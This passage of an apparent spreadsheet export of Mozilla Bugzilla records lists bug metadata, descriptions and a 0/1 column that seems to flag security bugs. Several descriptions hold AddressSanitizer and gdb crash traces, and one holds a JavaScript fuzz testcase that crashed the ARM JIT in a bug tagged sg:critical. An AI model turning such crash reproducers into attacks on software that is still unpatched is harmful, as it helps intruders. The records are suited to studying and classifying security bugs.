    #24 0x7fdf8c4819c8 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
Shadow byte and word:
  0x1ffbec83b9d0: fd
  0x1ffbec83b9d0: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1ffbec83b9b0: 00 00 00 fb fb fb fb fb
  0x1ffbec83b9b8: fb fb fb fb fb fb fb fb
  0x1ffbec83b9c0: fa fa fa fa fa fa fa fa
  0x1ffbec83b9c8: fa fa fa fa fa fa fa fa
=&gt;0x1ffbec83b9d0: fd fd fd fd fd fd fd fd
  0x1ffbec83b9d8: fd fd fd fd fd fd fd fd
  0x1ffbec83b9e0: fa fa fa fa fa fa fa fa
  0x1ffbec83b9e8: fa fa fa fa fa fa fa fa
  0x1ffbec83b9f0: 02 fb fb fb fb fb fb fb
Stats: 235M malloced (268M for red zones) by 475854 calls
Stats: 41M realloced by 21216 calls
Stats: 202M freed by 245094 calls
Stats: 69M really freed by 155750 calls
Stats: 440M (112717 full pages) mmaped in 110 calls
  mmaps   by size class: 8:278511; 9:40955; 10:16380; 11:14329; 12:3072; 13:1536; 14:1280; 15:256; 16:448; 17:1248; 18:144; 19:40; 20:16;
  mallocs by size class: 8:385323; 9:48551; 10:16749; 11:16755; 12:2604; 13:1970; 14:1504; 15:316; 16:520; 17:1336; 18:168; 19:42; 20:16;
  frees   by size class: 8:172072; 9:39112; 10:13415; 11:13609; 12:1698; 13:1660; 14:1305; 15:271; 16:462; 17:1323; 18:115; 19:39; 20:13;
  rfrees  by size class: 8:116704; 9:19801; 10:7916; 11:9035; 12:580; 13:511; 14:395; 15:147; 16:339; 17:288; 18:28; 19:5; 20:1;
Stats: malloc large: 1562 small slow: 2104
==5528== ABORTING</t>
        </is>
      </c>
      <c r="X3727" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3728">
      <c r="A3728" t="n">
        <v>1496319</v>
      </c>
      <c r="B3728" t="inlineStr">
        <is>
          <t>2018-10-03 23:14:48 -0700</t>
        </is>
      </c>
      <c r="C3728" t="inlineStr">
        <is>
          <t>Comments from Intermittent Failures Robot should also include build type (opt, debug, asan)</t>
        </is>
      </c>
      <c r="D3728" t="inlineStr">
        <is>
          <t>2021-12-05 14:47:40 -0800</t>
        </is>
      </c>
      <c r="E3728" t="n">
        <v>1</v>
      </c>
      <c r="F3728" t="n">
        <v>1</v>
      </c>
      <c r="G3728" t="n">
        <v>7</v>
      </c>
      <c r="H3728" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3728" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3728" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K3728" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3728" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3728" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3728" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3728" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3728" t="inlineStr"/>
      <c r="Q3728" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3728" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3728" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3728" t="n">
        <v>1</v>
      </c>
      <c r="U3728" t="n">
        <v>0</v>
      </c>
      <c r="V3728" t="n">
        <v>13</v>
      </c>
      <c r="W3728" t="inlineStr">
        <is>
          <t>I find me a lot in the situation that the comments as added by the robot do not include all the necessary information to quickly get an overview about the failures as happened. Therefore I manually have to click the link to see the results in the Viewer. Mostly this is simply to check for the build type.
As such it would be kinda helpful if the comments as being made by the robot would also include this information beside the branch, and platform details.</t>
        </is>
      </c>
      <c r="X3728" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3729">
      <c r="A3729" t="n">
        <v>769120</v>
      </c>
      <c r="B3729" t="inlineStr">
        <is>
          <t>2012-06-27 18:37:04 -0700</t>
        </is>
      </c>
      <c r="C3729" t="inlineStr">
        <is>
          <t>Bad iterator in text runs</t>
        </is>
      </c>
      <c r="D3729" t="inlineStr">
        <is>
          <t>2024-05-29 16:01:57 -0700</t>
        </is>
      </c>
      <c r="E3729" t="n">
        <v>1</v>
      </c>
      <c r="F3729" t="n">
        <v>1</v>
      </c>
      <c r="G3729" t="n">
        <v>3</v>
      </c>
      <c r="H3729" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3729" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3729" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K3729" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3729" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3729" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3729" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3729" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3729" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+][qa-]</t>
        </is>
      </c>
      <c r="Q3729" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3729" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3729" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T3729" t="n">
        <v>1</v>
      </c>
      <c r="U3729" t="n">
        <v>0</v>
      </c>
      <c r="V3729" t="n">
        <v>15</v>
      </c>
      <c r="W3729" t="inlineStr">
        <is>
          <t>Created attachment 637336
Testcase
Reproduces on trunk. The backIterator's line looks to be pointing to bad address.
    nsBlockFrame::line_iterator line = backIterator.GetLine();
    if (!backIterator.Prev() || backIterator.GetLine()-&gt;IsBlock()) {
ASAN:SIGSEGV
==15447== ERROR: AddressSanitizer crashed on unknown address 0x120000000006 (pc 0x7fa9f3a027e9 sp 0x7fff4ca846a0 bp 0x7fff4ca84770 T0)
AddressSanitizer can not provide additional info. ABORTING
    #0 0x7fa9f3a027e9 in nsLineBox::IsBlock() const layout/base/../generic/nsLineBox.h:225
    #1 0x7fa9f426075d in BuildTextRuns(gfxContext*, nsTextFrame*, nsIFrame*, nsLineList_iterator const*, nsTextFrame::TextRunType) layout/generic/nsTextFrameThebes.cpp:1220
    #2 0x7fa9f425d1a4 in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, gfxContext*, nsIFrame*, nsLineList_iterator const*, unsigned int*) layout/generic/nsTextFrameThebes.cpp:2391
    #3 0x7fa9f42cf6c8 in nsTextFrame::AddInlineMinWidthForFlow(nsRenderingContext*, nsIFrame::InlineMinWidthData*, nsTextFrame::TextRunType) layout/generic/nsTextFrameThebes.cpp:6594
    #4 0x7fa9f42d65c8 in nsTextFrame::AddInlineMinWidth(nsRenderingContext*, nsIFrame::InlineMinWidthData*) layout/generic/nsTextFrameThebes.cpp:6746
    #5 0x7fa9f3e50bf5 in nsContainerFrame::DoInlineIntrinsicWidth(nsRenderingContext*, nsIFrame::InlineIntrinsicWidthData*, nsLayoutUtils::IntrinsicWidthType) layout/generic/nsContainerFrame.cpp:813
    #6 0x7fa9f3e63b06 in nsFirstLetterFrame::AddInlineMinWidth(nsRenderingContext*, nsIFrame::InlineMinWidthData*) layout/generic/nsFirstLetterFrame.cpp:122
    #7 0x7fa9f39f8a1b in nsLayoutUtils::MinWidthFromInline(nsIFrame*, nsRenderingContext*) layout/base/nsLayoutUtils.cpp:3009
    #8 0x7fa9f3e63f38 in nsFirstLetterFrame::GetMinWidth(nsRenderingContext*) layout/generic/nsFirstLetterFrame.cpp:137
    #9 0x7fa9f3ed9595 in nsFrame::ShrinkWidthToFit(nsRenderingContext*, int) layout/generic/nsFrame.cpp:3935
    #10 0x7fa9f3e5270a in nsContainerFrame::ComputeAutoSize(nsRenderingContext*, nsSize, int, nsSize, nsSize, nsSize, bool) layout/generic/nsContainerFrame.cpp:860
    #11 0x7fa9f3ed4d8e in nsFrame::ComputeSize(nsRenderingContext*, nsSize, int, nsSize, nsSize, nsSize, unsigned int) layout/generic/nsFrame.cpp:3780
    #12 0x7fa9f3e64c1c in nsFirstLetterFrame::ComputeSize(nsRenderingContext*, nsSize, int, nsSize, nsSize, nsSize, unsigned int) layout/generic/nsFirstLetterFrame.cpp:158
    #13 0x7fa9f3e0780d in FloatMarginWidth(nsHTMLReflowState const&amp;, int, nsIFrame*, nsCSSOffsetState const&amp;) layout/generic/nsBlockReflowState.cpp:562
    #14 0x7fa9f3e00ff2 in nsBlockReflowState::FlowAndPlaceFloat(nsIFrame*) layout/generic/nsBlockReflowState.cpp:608
    #15 0x7fa9f3d6af86 in nsBlockFrame::ReflowPushedFloats(nsBlockReflowState&amp;, nsOverflowAreas&amp;, unsigned int&amp;) layout/generic/nsBlockFrame.cpp:6017
    #16 0x7fa9f3d6390d in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsBlockFrame.cpp:1057
    #17 0x7fa9f3e536a7 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) layout/generic/nsContainerFrame.cpp:906
    #18 0x7fa9f3e355b5 in nsColumnSetFrame::ReflowChildren(nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;, nsColumnSetFrame::ReflowConfig const&amp;, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&amp;) layout/generic/nsColumnSetFrame.cpp:665
    #19 0x7fa9f3e3c757 in nsColumnSetFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsColumnSetFrame.cpp:920
    #20 0x7fa9f3df3e3b in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) layout/generic/nsBlockReflowContext.cpp:262
    #21 0x7fa9f3d95137 in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) layout/generic/nsBlockFrame.cpp:3206
    #22 0x7fa9f3d8a826 in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) layout/generic/nsBlockFrame.cpp:2514
    #23 0x7fa9f3d73589 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) layout/generic/nsBlockFrame.cpp:2308
    #24 0x7fa9f3d63bcf in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsBlockFrame.cpp:1069
    #25 0x7fa9f3e536a7 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) layout/generic/nsContainerFrame.cpp:906
    #26 0x7fa9f3e355b5 in nsColumnSetFrame::ReflowChildren(nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;, nsColumnSetFrame::ReflowConfig const&amp;, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&amp;) layout/generic/nsColumnSetFrame.cpp:665
    #27 0x7fa9f3e3c757 in nsColumnSetFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsColumnSetFrame.cpp:920
    #28 0x7fa9f3e536a7 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) layout/generic/nsContainerFrame.cpp:906
    #29 0x7fa9f40239a7 in nsCanvasFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsCanvasFrame.cpp:429
    #30 0x7fa9f3e536a7 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) layout/generic/nsContainerFrame.cpp:906
    #31 0x7fa9f3f9d74e in nsHTMLScrollFrame::ReflowScrolledFrame(ScrollReflowState*, bool, bool, nsHTMLReflowMetrics*, bool) layout/generic/nsGfxScrollFrame.cpp:517
    #32 0x7fa9f3fa2ffa in nsHTMLScrollFrame::ReflowContents(ScrollReflowState*, nsHTMLReflowMetrics const&amp;) layout/generic/nsGfxScrollFrame.cpp:617
    #33 0x7fa9f3fa731f in nsHTMLScrollFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsGfxScrollFrame.cpp:858
    #34 0x7fa9f3e536a7 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) layout/generic/nsContainerFrame.cpp:906
    #35 0x7fa9f437bea1 in ViewportFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsViewportFrame.cpp:200
    #36 0x7fa9f3ad4ca6 in PresShell::DoReflow(nsIFrame*, bool) layout/base/nsPresShell.cpp:7383
    #37 0x7fa9f3b026ad in PresShell::ProcessReflowCommands(bool) layout/base/nsPresShell.cpp:7524
    #38 0x7fa9f3b00dbd in PresShell::FlushPendingNotifications(mozFlushType) layout/base/nsPresShell.cpp:3852
    #39 0x7fa9f3ba3d6b in nsRefreshDriver::Notify(nsITimer*) layout/base/nsRefreshDriver.cpp:396
    #40 0x7fa9fe7af1a6 in nsTimerImpl::Fire() xpcom/threads/nsTimerImpl.cpp:477
    #41 0x7fa9fe7b0d1c in nsTimerEvent::Run() xpcom/threads/nsTimerImpl.cpp:558
    #42 0x7fa9fe7733d3 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:625
    #43 0x7fa9fe40242d in NS_ProcessNextEvent_P(nsIThread*, bool) objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:217
    #44 0x7fa9fb5fe026 in nsXULWindow::ShowModal() xpfe/appshell/src/nsXULWindow.cpp:378
    #45 0x7fa9fb5e0fa2 in nsContentTreeOwner::ShowAsModal() xpfe/appshell/src/nsContentTreeOwner.cpp:529
    #46 0x7fa9fb5e111c in non-virtual thunk to nsContentTreeOwner::ShowAsModal() modules/zlib/src/inffast.c:0
    #47 0x7fa9fb409574 in nsWindowWatcher::OpenWindowJSInternal(nsIDOMWindow*, char const*, char const*, char const*, bool, nsIArray*, bool, nsIDOMWindow**) embedding/components/windowwatcher/src/nsWindowWatcher.cpp:1000
    #48 0x7fa9fb3ffb51 in nsWindowWatcher::OpenWindow(nsIDOMWindow*, char const*, char const*, char const*, nsISupports*, nsIDOMWindow**) embedding/components/windowwatcher/src/nsWindowWatcher.cpp:381
    #49 0x7fa9fe87289a in NS_InvokeByIndex_P xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:161
    #50 0x7fa9fa1de9db in CallMethodHelper::Call() js/xpconnect/src/XPCWrappedNative.cpp:2405
    #51 0x7fa9fa245db4 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1474
    #52 0x7faa03b969dd in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), js::CallArgs const&amp;) js/src/jscntxtinlines.h:400
    #53 0x7faa03b0abbd in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) js/src/jsinterp.cpp:2437
    #54 0x7faa03a90397 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) js/src/jsinterp.cpp:267
    #55 0x7faa03b96dff in js::InvokeKernel(JSContext*, js::CallArgs, js::MaybeConstruct) js/src/jsinterp.cpp:322
    #56 0x7faa03531210 in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) js/src/jsinterp.h:100
    #57 0x7faa03b9bf2d in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) js/src/jsinterp.cpp:354
    #58 0x7faa033ddd69 in JS_CallFunctionValue js/src/jsapi.cpp:5499
    #59 0x7fa9fa18dd32 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) js/xpconnect/src/XPCWrappedJSClass.cpp:1471
    #60 0x7fa9fa13f6b8 in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) js/xpconnect/src/XPCWrappedJS.cpp:580
    #61 0x7fa9fe878450 in PrepareAndDispatch xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:121
    #62 0x7fa9fe875be7 in SharedStub xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:0
    #63 0x7fa9fe87289a in NS_InvokeByIndex_P xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:161
Stats: 146M malloced (161M for red zones) by 349338 calls
Stats: 41M realloced by 19068 calls
Stats: 109M freed by 225400 calls
Stats: 0M really freed by 0 calls
Stats: 340M (87088 full pages) mmaped in 85 calls
  mmaps   by size class: 8:278511; 9:49146; 10:20475; 11:18423; 12:3072; 13:2048; 14:1536; 15:384; 16:576; 17:128; 18:160; 19:40; 20:16;
  mallocs by size class: 8:264631; 9:45378; 10:16372; 11:16361; 12:2245; 13:1771; 14:1409; 15:325; 16:527; 17:113; 18:153; 19:40; 20:13;
  frees   by size class: 8:159416; 9:35324; 10:13021; 11:13202; 12:1408; 13:876; 14:1217; 15:274; 16:457; 17:99; 18:58; 19:38; 20:10;
  rfrees  by size class:
Stats: malloc large: 319 small slow: 1810</t>
        </is>
      </c>
      <c r="X3729" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3730">
      <c r="A3730" t="n">
        <v>680687</v>
      </c>
      <c r="B3730" t="inlineStr">
        <is>
          <t>2011-08-20 11:35:56 -0700</t>
        </is>
      </c>
      <c r="C3730" t="inlineStr">
        <is>
          <t>Crash [@ nsSVGSwitchElement::FindActiveChild] after GC</t>
        </is>
      </c>
      <c r="D3730" t="inlineStr">
        <is>
          <t>2012-02-16 14:17:16 -0800</t>
        </is>
      </c>
      <c r="E3730" t="n">
        <v>1</v>
      </c>
      <c r="F3730" t="n">
        <v>1</v>
      </c>
      <c r="G3730" t="n">
        <v>3</v>
      </c>
      <c r="H3730" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3730" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3730" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K3730" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3730" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3730" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3730" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3730" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3730" t="inlineStr">
        <is>
          <t>[sg:critical?][qa!] possible regression from 335998?</t>
        </is>
      </c>
      <c r="Q3730" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3730" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3730" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3730" t="n">
        <v>1</v>
      </c>
      <c r="U3730" t="n">
        <v>0</v>
      </c>
      <c r="V3730" t="n">
        <v>15</v>
      </c>
      <c r="W3730" t="inlineStr">
        <is>
          <t>Created attachment 554650
testcase (requires extension for GC) (crashes when loaded)
1. Install https://www.squarefree.com/extensions/domFuzzLite2.xpi
2. Load the testcase.
Result:
  Debug: Crash [@ nsSVGSwitchElement::FindActiveChild] calling 0x0 ?
  Opt:   Crash [@ nsNodeUtils::ContentRemoved]         calling bogus ?
The GC pattern makes me wonder if this is related to bug 335998 being fixed.</t>
        </is>
      </c>
      <c r="X3730" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3731">
      <c r="A3731" t="n">
        <v>888358</v>
      </c>
      <c r="B3731" t="inlineStr">
        <is>
          <t>2013-06-28 10:14:43 -0700</t>
        </is>
      </c>
      <c r="C3731" t="inlineStr">
        <is>
          <t>Deploy Potatolytics (packaged app-patible GA)</t>
        </is>
      </c>
      <c r="D3731" t="inlineStr">
        <is>
          <t>2014-04-25 10:18:16 -0700</t>
        </is>
      </c>
      <c r="E3731" t="n">
        <v>1</v>
      </c>
      <c r="F3731" t="n">
        <v>1</v>
      </c>
      <c r="G3731" t="n">
        <v>6</v>
      </c>
      <c r="H3731" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3731" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J3731" t="inlineStr">
        <is>
          <t>Consumer Pages</t>
        </is>
      </c>
      <c r="K3731" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L3731" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3731" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N3731" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3731" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3731" t="inlineStr"/>
      <c r="Q3731" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3731" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3731" t="inlineStr">
        <is>
          <t>2014-04-29</t>
        </is>
      </c>
      <c r="T3731" t="n">
        <v>1</v>
      </c>
      <c r="U3731" t="n">
        <v>0</v>
      </c>
      <c r="V3731" t="n">
        <v>17</v>
      </c>
      <c r="W3731" t="inlineStr">
        <is>
          <t>GA isn't compatible with a packaged app, so we should be working hard to create a solution based on the feedback of the GA premium support team:
1. Create an iframe which embeds GA
2. Use postMessage to pass page views, events, and variables to the iframe
Pretty straightforward, but we need to test this and make sure it doesn't gum anything up, namely getting weird URLs due to passing a full URL (with origin) to the GA page view method.</t>
        </is>
      </c>
      <c r="X3731" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3732">
      <c r="A3732" t="n">
        <v>696748</v>
      </c>
      <c r="B3732" t="inlineStr">
        <is>
          <t>2011-10-24 06:20:30 -0700</t>
        </is>
      </c>
      <c r="C3732" t="inlineStr">
        <is>
          <t>[ARM] Assertion failure: (inst &amp; mask) == expected, at ../methodjit/ICChecker.h:56</t>
        </is>
      </c>
      <c r="D3732" t="inlineStr">
        <is>
          <t>2013-03-20 04:50:33 -0700</t>
        </is>
      </c>
      <c r="E3732" t="n">
        <v>1</v>
      </c>
      <c r="F3732" t="n">
        <v>1</v>
      </c>
      <c r="G3732" t="n">
        <v>3</v>
      </c>
      <c r="H3732" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3732" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3732" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3732" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3732" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M3732" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3732" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3732" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3732" t="inlineStr">
        <is>
          <t>[sg:critical] js-triage-needed</t>
        </is>
      </c>
      <c r="Q3732" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3732" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3732" t="inlineStr">
        <is>
          <t>mozilla11</t>
        </is>
      </c>
      <c r="T3732" t="n">
        <v>1</v>
      </c>
      <c r="U3732" t="n">
        <v>0</v>
      </c>
      <c r="V3732" t="n">
        <v>16</v>
      </c>
      <c r="W3732" t="inlineStr">
        <is>
          <t>The following test crashes on mozilla-central revision e79245e249c4 (options -m -n -a), armv7-a arch only:
try {
this.watch("b", "".substring);
} catch(exc1) {}
eval("\
var URI = '';\
test();\
function test() {\
  URI += '&lt;zcti application=\"xxxx_demo\"&gt;';\
  URI += '&lt;pstn_data&gt;';\
  URI += '&lt;dnis&gt;877-485-xxxx&lt;/dnis&gt;';\
  URI += '&lt;/pstn_data&gt;';\
  URI &gt;&gt;=  '&lt;keyvalue key=\"name\" value=\"xxx\"/&gt;';\
  URI += '&lt;keyvalue key=\"phone\" value=\"6509309000\"/&gt;';\
}\
test();\
");
The optimized build does not crash, but stepping through the assertion causes a crash (but the assert also differs here). It might be that the testcase requires additional tweaking to reveal the issue on opt. Marking this as S-s due to the crash. If the crash is debug-only, feel free unhide.
Backtrace of crash:
Program received signal SIGABRT, Aborted.
Assertion failure: (*insn &amp; 0x012fff30) == 0x012fff30
(../assembler/assembler/ARMAssembler.h:994 static JSC::ARMWord* JSC::ARMAssembler::getLdrImmAddress(JSC::ARMWord*))
Program received signal SIGSEGV, Segmentation fault.
0x00282b98 in JSC::ARMAssembler::getLdrImmAddress (insn=0x4009a188) at ../assembler/assembler/ARMAssembler.h:994
994                     ASSERT((*insn &amp; 0x012fff30) == 0x012fff30);
(gdb) bt
#0  0x00282b98 in JSC::ARMAssembler::getLdrImmAddress (insn=0x4009a188) at ../assembler/assembler/ARMAssembler.h:994
#1  0x00282c5c in JSC::ARMAssembler::patchPointerInternal (from=1074373000, to=0x2f6045) at ../assembler/assembler/ARMAssembler.h:1020
#2  0x002f6772 in JSC::ARMAssembler::relinkCall (from=0x4009a188, to=0x2f6045) at ../assembler/assembler/ARMAssembler.h:1139
#3  0x002f687c in JSC::MacroAssemblerARM::repatchCall (call=..., destination=...) at ../assembler/assembler/MacroAssemblerARM.h:1523
#4  0x002f6ec8 in JSC::RepatchBuffer::relink (this=0xbe8ad664, call=..., destination=...) at ../assembler/assembler/RepatchBuffer.h:95
#5  0x002f6f9e in js::mjit::ic::Repatcher::relink (this=0xbe8ad664, call=..., stub=...) at ../methodjit/ICRepatcher.h:90
#6  0x002f3c78 in PatchSetFallback (f=..., ic=0x456800) at /home/decoder/LangFuzz/mozilla-central/js/src/methodjit/MonoIC.cpp:150
#7  0x002f46ce in UpdateSetGlobalName (f=..., ic=0x456800, obj=0x40b00040, shape=0x40b0efb0) at /home/decoder/LangFuzz/mozilla-central/js/src/methodjit/MonoIC.cpp:280
#8  0x002f4886 in js::mjit::ic::SetGlobalName (f=..., ic=0x456800) at /home/decoder/LangFuzz/mozilla-central/js/src/methodjit/MonoIC.cpp:329
#9  0x00281352 in JaegerStubVeneer () at /home/decoder/LangFuzz/mozilla-central/js/src/methodjit/MethodJIT.cpp:164
#10 0x4009a194 in ?? ()
Cannot access memory at address 0x0
#11 0x4009a194 in ?? ()
Cannot access memory at address 0x0
Backtrace stopped: previous frame identical to this frame (corrupt stack?)</t>
        </is>
      </c>
      <c r="X3732" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3733">
      <c r="A3733" t="n">
        <v>97044</v>
      </c>
      <c r="B3733" t="inlineStr">
        <is>
          <t>2001-08-26 10:27:39 -0700</t>
        </is>
      </c>
      <c r="C3733" t="inlineStr">
        <is>
          <t>PSM is passing null string to preferences [@ nsPrefBranch::QueryObserver]</t>
        </is>
      </c>
      <c r="D3733" t="inlineStr">
        <is>
          <t>2016-09-27 13:03:20 -0700</t>
        </is>
      </c>
      <c r="E3733" t="n">
        <v>1</v>
      </c>
      <c r="F3733" t="n">
        <v>1</v>
      </c>
      <c r="G3733" t="n">
        <v>6</v>
      </c>
      <c r="H3733" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3733" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J3733" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K3733" t="inlineStr">
        <is>
          <t>Other Branch</t>
        </is>
      </c>
      <c r="L3733" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3733" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3733" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3733" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3733" t="inlineStr">
        <is>
          <t>critical for 0.9.4</t>
        </is>
      </c>
      <c r="Q3733" t="inlineStr">
        <is>
